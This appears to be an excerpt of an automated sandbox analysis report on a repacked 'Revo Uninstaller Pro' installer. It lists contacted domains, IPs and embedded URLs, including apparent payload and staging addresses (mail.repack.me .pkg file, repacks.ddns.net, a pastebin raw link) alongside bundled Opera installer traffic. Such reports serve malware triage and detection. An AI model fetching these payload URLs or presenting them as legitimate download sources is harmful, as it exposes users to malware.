      http://www.borland.com/namespaces/TypesA0%Avira URL Cloudsafe
      https://repack.me/ad.html0%Avira URL Cloudsafe
      http://www.borland.com/namespaces/Types0%Avira URL Cloudsafe
      http://repacks.ddns.netopen0%Avira URL Cloudsafe
      https://mail.repack.me/tsjtmfdm.pkg20%Avira URL Cloudsafe
      https://www.revouninstaller.comAffHomewww.revouninstaller.comwww.revouninstallerpro.com0%Avira URL Cloudsafe
      http://www.word-pdf-converter.com/5.67B160777-E232-46C5-8DC0-5BC8B49E77496.10%Avira URL Cloudsafe
      https://legal.opera.com/eula/computers0%Avira URL Cloudsafe
      NameIPActiveMaliciousAntivirus DetectionReputation
      mail.repack.me
      194.87.189.43
      truefalse
        unknown
        na-download.opera.com
        107.167.96.36
        truefalse
          high
          na-autoupdate.opera.com
          107.167.96.38
          truefalse
            high
            submit-trn.osp.opera.software
            107.167.125.189
            truefalse
              high
              trn.lb.opera.technology
              107.167.96.30
              truefalse
                high
                pastebin.com
                104.20.3.235
                truefalse
                  high
                  autoupdate.geo.opera.com
                  unknown
                  unknownfalse
                    high
                    download3.operacdn.com
                    unknown
                    unknownfalse
                      high
                      desktop-netinstaller-sub.osp.opera.software
                      unknown
                      unknownfalse
                        high
                        features.opera-api2.com
                        unknown
                        unknownfalse
                          high
                          autoupdate.opera.com
                          unknown
                          unknownfalse
                            high
                            net.geo.opera.com
                            unknown
                            unknownfalse
                              high
                              download.opera.com
                              unknown
                              unknownfalse
                                high
                                NameMaliciousAntivirus DetectionReputation
                                https://features.opera-api2.com/api/v2/features?country=US&language=en-GB&uuid=a6c287cc-47e5-4bf0-9dac-fbaf9040d09e&product=&channel=Stable&version=115.0.5322.77false
                                  high
                                  https://desktop-netinstaller-sub.osp.opera.software/v1/binaryfalse
                                    high
                                    https://download.opera.com/download/get/?id=69044&autoupdate=1&ni=1&stream=stable&utm_campaign=r10&utm_medium=apb&utm_source=DWNLST&niuid=cd9f81c6-729a-4d95-ac71-1ebba75bfc7bfalse
                                      high
                                      https://mail.repack.me/tsjtmfdm.pkgfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://autoupdate.opera.com/me/false
                                        high
                                        https://autoupdate.geo.opera.com/v5/netinstaller/opera/Stable/windows/x64false
                                          high
                                          NameSourceMaliciousAntivirus DetectionReputation
                                          https://mail.repack.me/yRevo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.2362580830.000000000B29C000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.2191327824.000000000B29C000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://legal.opera.com/termssetup.exe, 0000001D.00000000.2721982112.000000000012A000.00000002.00000001.01000000.00000019.sdmp, setup.exe, 0000001E.00000001.2731861623.00000000001EA000.00000002.00000001.01000000.0000001C.sdmp, setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://mail.repack.me/tsjtmfdm.pkgoRevo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.2362580830.000000000B29C000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.2191327824.000000000B29C000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://help.opera.com/latest/setup.exe, 0000001D.00000000.2721982112.000000000012A000.00000002.00000001.01000000.00000019.sdmp, setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmpfalse
                                            high
                                            https://www.revouninstaller.com/feedback/?product=pro%d-%d-%dLastRevo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006045000.00000004.00000020.00020000.00000000.sdmp, RevoUninPro.exe, 00000009.00000000.2018481789.000000014095B000.00000002.00000001.01000000.0000000C.sdmp, RevoUninPro.exe, 0000000C.00000000.2134444155.000000014095B000.00000002.00000001.01000000.0000000C.sdmpfalse
                                              high
                                              http://www.schneier.com/paper-blowfish-fse.htmlSruplp.exe, 0000000A.00000000.2096953602.000000000041D000.00000020.00000001.01000000.0000000F.sdmpfalse
                                                high
                                                https://policies.google.com/terms;setup.exe, 0000001D.00000000.2721982112.000000000012A000.00000002.00000001.01000000.00000019.sdmp, setup.exe, 0000001E.00000001.2731861623.00000000001EA000.00000002.00000001.01000000.0000001C.sdmp, setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmpfalse
                                                  high
                                                  https://download.opera.com/download/get/?partner=www&opsys=Windows&utm_source=netinstallersetup.exe, 0000001D.00000000.2721982112.000000000012A000.00000002.00000001.01000000.00000019.sdmp, setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmpfalse
                                                    high
                                                    http://www.mirage-systems.de/tqruplp.exe, 0000000A.00000003.2102817735.0000000002C91000.00000004.00001000.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://tools.ietf.org/html/rfc4648Sruplp.exe, 0000000A.00000000.2096953602.000000000041D000.00000020.00000001.01000000.0000000F.sdmpfalse
                                                      high
                                                      http://localhost:3001api/prefs/?product=$1&version=$2..setup.exe, 0000001D.00000000.2721982112.000000000012A000.00000002.00000001.01000000.00000019.sdmp, setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://crashpad.chromium.org/https://crashpad.chromium.org/bug/newsetup.exe, 0000001D.00000000.2721982112.000000000012A000.00000002.00000001.01000000.00000019.sdmp, setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://www.opera.com/download/setup.exe, 0000001D.00000000.2721982112.000000000012A000.00000002.00000001.01000000.00000019.sdmp, setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmpfalse
                                                        high
                                                        https://www.revouninstaller.com/revo-uninstaller-mobile-qr-and-link/Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000004072000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          http://schemas.xmlsoap.org/wsdl/soap12/SVruplp.exe, 0000000A.00000000.2096953602.000000000041D000.00000020.00000001.01000000.0000000F.sdmpfalse
                                                            high
                                                            http://www.color.orgruplp.exe, 0000000A.00000000.2096953602.000000000041D000.00000020.00000001.01000000.0000000F.sdmpfalse
                                                              high
                                                              http:////file:////www.web.OSRevo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000003890000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.000000000569D000.00000004.00000020.00020000.00000000.sdmp, RevoUninPro.exe, 00000009.00000000.2018481789.0000000140887000.00000002.00000001.01000000.0000000C.sdmp, RevoUninPro.exe, 0000000C.00000000.2134444155.0000000140887000.00000002.00000001.01000000.0000000C.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://www.revouninstaller.com/contact-us/C:Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000004072000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                http://autoupdate-staging.services.ams.osa/netinstallervwindows?&Onesetup.exe, 0000001D.00000000.2721982112.000000000012A000.00000002.00000001.01000000.00000019.sdmp, setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://www.mirage-systems.de/Qruplp.exe, 0000000A.00000003.2102817735.0000000002C91000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://www.opera.comsetup.exe, 0000001D.00000000.2721982112.000000000012A000.00000002.00000001.01000000.00000019.sdmp, setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmpfalse
                                                                  high
                                                                  https://crashstats-collector-2.opera.com/setup.exe, 0000001D.00000000.2721982112.000000000012A000.00000002.00000001.01000000.00000019.sdmp, setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmpfalse
                                                                    high
                                                                    https://autoupdate.geo.opera.com/https://autoupdate.opera.com/me/OperaDesktophttps://crashstats-collsetup.exe, 0000001D.00000000.2721982112.000000000012A000.00000002.00000001.01000000.00000019.sdmp, setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmpfalse
                                                                      high
                                                                      http://crl.microsoftRRpowershell.exe, 00000011.00000002.2327417192.00000000083CC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      http://www.mirage-systems.de/aruplp.exe, 0000000A.00000003.2102817735.0000000002C91000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      https://www.revouninstaller.com/support/Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000004072000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006045000.00000004.00000020.00020000.00000000.sdmp, RevoUninPro.exe, 00000009.00000000.2018481789.000000014095B000.00000002.00000001.01000000.0000000C.sdmp, RevoUninPro.exe, 0000000C.00000000.2134444155.000000014095B000.00000002.00000001.01000000.0000000C.sdmpfalse
                                                                        high
                                                                        https://crashpad.chromium.org/setup.exe, 0000001D.00000000.2721982112.000000000012A000.00000002.00000001.01000000.00000019.sdmp, setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        https://addons.opera.com/en/extensions/details/dify-cashback/setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmpfalse
                                                                          high
                                                                          https://www.revouninstallerpro.com/db/ilogs/UninstallerRevo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006045000.00000004.00000020.00020000.00000000.sdmp, RevoUninPro.exe, 00000009.00000000.2018481789.000000014095B000.00000002.00000001.01000000.0000000C.sdmp, RevoUninPro.exe, 0000000C.00000000.2134444155.000000014095B000.00000002.00000001.01000000.0000000C.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://www.revouninstaller.com/revo-uninstaller-mobile-qr-and-link/SoftwareRevo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006045000.00000004.00000020.00020000.00000000.sdmp, RevoUninPro.exe, 00000009.00000000.2018481789.000000014095B000.00000002.00000001.01000000.0000000C.sdmp, RevoUninPro.exe, 0000000C.00000000.2134444155.000000014095B000.00000002.00000001.01000000.0000000C.sdmpfalse
                                                                            high
                                                                            http://schemas.xmlsoap.org/soap/encoding/ruplp.exe, 0000000A.00000003.2102817735.0000000002C8A000.00000004.00001000.00020000.00000000.sdmp, ruplp.exe, 0000000A.00000000.2096953602.000000000041D000.00000020.00000001.01000000.0000000F.sdmpfalse
                                                                              high
                                                                              http://tools.ietf.org/html/rfc1321ruplp.exe, 0000000A.00000000.2096953602.000000000041D000.00000020.00000001.01000000.0000000F.sdmpfalse
                                                                                high
                                                                                http://www.opera.com0setup.exe, 0000001D.00000000.2721982112.000000000012A000.00000002.00000001.01000000.00000019.sdmp, setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmpfalse
                                                                                  high
                                                                                  https://pastebin.com/raw/vkwZzU9B.Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.2159455427.000000000B29C000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.2159703361.000000000B29C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://opera.com/privacysetup.exe, 0000001D.00000000.2721982112.000000000012A000.00000002.00000001.01000000.00000019.sdmp, setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmpfalse
                                                                                      high
                                                                                      http://csrc.nist.gov/publications/drafts/800-67-rev1/SP-800-67-rev1-2_July-2011.pdfSruplp.exe, 0000000A.00000000.2096953602.000000000041D000.00000020.00000001.01000000.0000000F.sdmpfalse
                                                                                        high
                                                                                        http://nsis.sf.net/NSIS_ErrorErrorRevo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000000.1750050502.000000000040A000.00000008.00000001.01000000.00000003.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.1970159457.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2776621684.000000000040A000.00000004.00000001.01000000.00000003.sdmp, PACK.EXE, 00000010.00000003.2198109948.0000000002E54000.00000004.00000020.00020000.00000000.sdmp, PACK.EXE, 00000010.00000003.2199870901.0000000000C50000.00000004.00000020.00020000.00000000.sdmp, PACK.EXE, 00000010.00000003.2198460363.0000000000C4F000.00000004.00000020.00020000.00000000.sdmp, PACK.EXE, 00000010.00000003.2199605579.0000000000C50000.00000004.00000020.00020000.00000000.sdmp, PACK.EXE, 00000010.00000003.2199929800.0000000000C52000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://www.symauth.com/cps0(Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000002E22000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://gamemaker.io)setup.exe, 0000001D.00000000.2721982112.000000000012A000.00000002.00000001.01000000.00000019.sdmp, setup.exe, 0000001E.00000001.2731861623.00000000001EA000.00000002.00000001.01000000.0000001C.sdmp, setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            https://mail.repack.me/Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.2362580830.000000000B29C000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.2362051607.000000000B276000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.2191327824.000000000B29C000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.2191500182.000000000B276000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            https://sourcecode.opera.comsetup.exe, 0000001D.00000000.2721982112.000000000012A000.00000002.00000001.01000000.00000019.sdmp, setup.exe, 0000001E.00000001.2731861623.00000000001EA000.00000002.00000001.01000000.0000001C.sdmp, setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            http://www.animation.arthouse.orgruplp.exe, 0000000A.00000000.2100083068.0000000000D87000.00000002.00000001.01000000.0000000F.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            https://www.revouninstaller.com/revo-uninstaller-pro-full-version-history/)Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000002E22000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://mail.repack.me/rosoftRevo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.2362051607.000000000B276000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.2191500182.000000000B276000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
                                                                                              http://crl.micropowershell.exe, 00000011.00000002.2327417192.00000000083CC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2323270683.00000000072E4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                http://www.Licence-Protector.comruplp.exe, 0000000A.00000000.2100083068.0000000000D87000.00000002.00000001.01000000.0000000F.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                unknown
                                                                                                http://www.symauth.com/rpa00Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000002E22000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  http://schemas.xmlsoap.org/wsdl/http/ruplp.exe, 0000000A.00000000.2096953602.000000000041D000.00000020.00000001.01000000.0000000F.sdmpfalse
                                                                                                    high
                                                                                                    http://schemas.xmlsoap.org/wsdl/ruplp.exe, 0000000A.00000000.2096953602.000000000041D000.00000020.00000001.01000000.0000000F.sdmpfalse
                                                                                                      high
                                                                                                      https://gamemaker.io/en/get.setup.exe, 0000001D.00000000.2721982112.000000000012A000.00000002.00000001.01000000.00000019.sdmp, setup.exe, 0000001E.00000001.2731861623.00000000001EA000.00000002.00000001.01000000.0000001C.sdmp, setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmpfalse
                                                                                                        high
                                                                                                        https://gamemaker.iosetup.exe, 0000001D.00000000.2721982112.000000000012A000.00000002.00000001.01000000.00000019.sdmp, setup.exe, 0000001E.00000001.2731861623.00000000001EA000.00000002.00000001.01000000.0000001C.sdmp, setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmpfalse
                                                                                                          high
                                                                                                          https://help.instagram.com/581066165581870;setup.exe, 0000001D.00000000.2721982112.000000000012A000.00000002.00000001.01000000.00000019.sdmp, setup.exe, 0000001E.00000001.2731861623.00000000001EA000.00000002.00000001.01000000.0000001C.sdmp, setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmpfalse
                                                                                                            high
                                                                                                            https://www.revouninstallerpro.com/db/ilogs/.ruelDeleteRevo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000004072000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            unknown
                                                                                                            http://www.vsrevogroup.comRevo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000004DC5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            unknown
                                                                                                            http://www.ietf.org/rfc/rfc3447.txtSruplp.exe, 0000000A.00000000.2096953602.000000000041D000.00000020.00000001.01000000.0000000F.sdmpfalse
                                                                                                              high
                                                                                                              http://www.mirage-systems.de/%operationName%ruplp.exe, 0000000A.00000000.2096953602.000000000041D000.00000020.00000001.01000000.0000000F.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              unknown
                                                                                                              https://pastebin.com/raw/vkwZzU9BdRevo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777185500.00000000006D9000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.2775823777.00000000006D9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://pastebin.com/raw/vkwZzU9Bget8191Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2776929770.0000000000663000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://www.opera.com/privacysetup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmpfalse
                                                                                                                    high
                                                                                                                    https://crashpad.chromium.org/bug/newsetup.exe, 0000001D.00000000.2721982112.000000000012A000.00000002.00000001.01000000.00000019.sdmp, setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmpfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    unknown
                                                                                                                    http://www.revouninstaller.com/)Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000002E22000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      http://schemas.xmlsoap.org/soap/envelope/ruplp.exe, 0000000A.00000000.2096953602.000000000041D000.00000020.00000001.01000000.0000000F.sdmpfalse
                                                                                                                        high
                                                                                                                        https://pastebin.com/raw/vkwZzU9BsRevo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777185500.00000000006D9000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.2775823777.00000000006D9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://gamemaker.io/en/education.setup.exe, 0000001D.00000000.2721982112.000000000012A000.00000002.00000001.01000000.00000019.sdmp, setup.exe, 0000001E.00000001.2731861623.00000000001EA000.00000002.00000001.01000000.0000001C.sdmp, setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmpfalse
                                                                                                                            high
                                                                                                                            https://legal.opera.com/terms.setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmpfalse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            unknown
                                                                                                                            https://pastebin.com/raw/vkwZzU9BtRevo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.2159553605.000000000B276000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.2362051607.000000000B276000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.2191500182.000000000B276000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              http://www.mirage-systems.de/ruplp.exe, 0000000A.00000003.2102817735.0000000002C91000.00000004.00001000.00020000.00000000.sdmp, ruplp.exe, 0000000A.00000000.2096953602.000000000041D000.00000020.00000001.01000000.0000000F.sdmpfalse
                                                                                                                              • Avira URL Cloud: safe
                                                                                                                              unknown
                                                                                                                              http://repacks.ddns.nethttps://repack.me/ad.htmlopenRevo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2776929770.0000000000663000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              • Avira URL Cloud: safe
                                                                                                                              unknown
                                                                                                                              https://telegram.org/tos/setup.exe, 0000001D.00000000.2721982112.000000000012A000.00000002.00000001.01000000.00000019.sdmp, setup.exe, 0000001E.00000001.2731861623.00000000001EA000.00000002.00000001.01000000.0000001C.sdmp, setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmpfalse
                                                                                                                                high
                                                                                                                                http://csrc.nist.gov/publications/fips/fips46-3/fips46-3.pdfSruplp.exe, 0000000A.00000000.2096953602.000000000041D000.00000020.00000001.01000000.0000000F.sdmpfalse
                                                                                                                                  high
                                                                                                                                  http://schemas.xmlsoap.org/wsdl/soap/ruplp.exe, 0000000A.00000000.2096953602.000000000041D000.00000020.00000001.01000000.0000000F.sdmpfalse
                                                                                                                                    high
                                                                                                                                    http://www.borland.com/namespaces/TypesAruplp.exe, 0000000A.00000003.2102817735.0000000002C6D000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                    unknown
                                                                                                                                    https://repack.me/ad.htmlRevo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2776929770.0000000000663000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                    unknown
                                                                                                                                    http://www.movable-type.co.uk/scripts/xxtea.pdfSruplp.exe, 0000000A.00000000.2096953602.000000000041D000.00000020.00000001.01000000.0000000F.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://addons.opera.com/extensions/download/be76331b95dfc399cd776d2fc68021e0db03cc4f.opera.comsetup.exe, 0000001D.00000000.2721982112.000000000012A000.00000002.00000001.01000000.00000019.sdmp, setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmpfalse
                                                                                                                                        high
                                                                                                                                        http://csrc.nist.gov/publications/drafts/fips180-4/Draft-FIPS180-4_Feb2011.pdfruplp.exe, 0000000A.00000000.2096953602.000000000041D000.00000020.00000001.01000000.0000000F.sdmpfalse
                                                                                                                                          high
                                                                                                                                          http://www.borland.com/namespaces/Typesruplp.exe, 0000000A.00000003.2102817735.0000000002C6D000.00000004.00001000.00020000.00000000.sdmp, ruplp.exe, 0000000A.00000000.2096953602.000000000041D000.00000020.00000001.01000000.0000000F.sdmpfalse
                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                          unknown
                                                                                                                                          https://www.revouninstaller.com/buy-update-subscription-btn/https://www.revouninstaller.com/buy-now-Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000004072000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006045000.00000004.00000020.00020000.00000000.sdmp, RevoUninPro.exe, 00000009.00000000.2018481789.000000014095B000.00000002.00000001.01000000.0000000C.sdmp, RevoUninPro.exe, 0000000C.00000000.2134444155.000000014095B000.00000002.00000001.01000000.0000000C.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://www.revouninstaller.com/feedback/?product=proRevo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000004072000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              http://www.csrc.nist.gov/publications/fips/fips197/fips-197.pdfSruplp.exe, 0000000A.00000000.2096953602.000000000041D000.00000020.00000001.01000000.0000000F.sdmpfalse
                                                                                                                                                high
                                                                                                                                                http://www.borland.com/namespaces/Typesaruplp.exe, 0000000A.00000003.2102817735.0000000002C6D000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                  unknown
                                                                                                                                                  https://autoupdate.geo.opera.com/setup.exe, 0000001D.00000000.2721982112.000000000012A000.00000002.00000001.01000000.00000019.sdmp, setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    https://twitter.com/en/tos;setup.exe, 0000001D.00000000.2721982112.000000000012A000.00000002.00000001.01000000.00000019.sdmp, setup.exe, 0000001E.00000001.2731861623.00000000001EA000.00000002.00000001.01000000.0000001C.sdmp, setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      https://redir.opera.com/uninstallsurvey/setup.exe, 0000001D.00000000.2721982112.000000000012A000.00000002.00000001.01000000.00000019.sdmp, setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        http://www.aiim.org/pdfa/ns/id/ruplp.exe, 0000000A.00000000.2096953602.000000000041D000.00000020.00000001.01000000.0000000F.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          http://csrc.nist.gov/publications/nistpubs/800-38a/sp800-38a.pdfruplp.exe, 0000000A.00000000.2096953602.000000000041D000.00000020.00000001.01000000.0000000F.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            http://repacks.ddns.netopenRevo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2776929770.0000000000663000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                            unknown
                                                                                                                                                            http://www.borland.com/rootpart.xmlruplp.exe, 0000000A.00000000.2096953602.000000000041D000.00000020.00000001.01000000.0000000F.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              https://mail.repack.me/tsjtmfdm.pkg2Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.2362580830.000000000B29C000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.2191327824.000000000B29C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                              unknown
                                                                                                                                                              http://www.word-pdf-converter.com/5.67B160777-E232-46C5-8DC0-5BC8B49E77496.1Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006F17000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                              unknown
                                                                                                                                                              https://www.revouninstaller.com/downloads-manager/?filename=pro-%shttps://www.revouninstaller.com/upRevo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000004072000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                https://www.revouninstaller.comAffHomewww.revouninstaller.comwww.revouninstallerpro.comRevo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000004072000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006045000.00000004.00000020.00020000.00000000.sdmp, RevoUninPro.exe, 00000009.00000000.2018481789.000000014095B000.00000002.00000001.01000000.0000000C.sdmp, RevoUninPro.exe, 0000000C.00000000.2134444155.000000014095B000.00000002.00000001.01000000.0000000C.sdmpfalse
                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                unknown
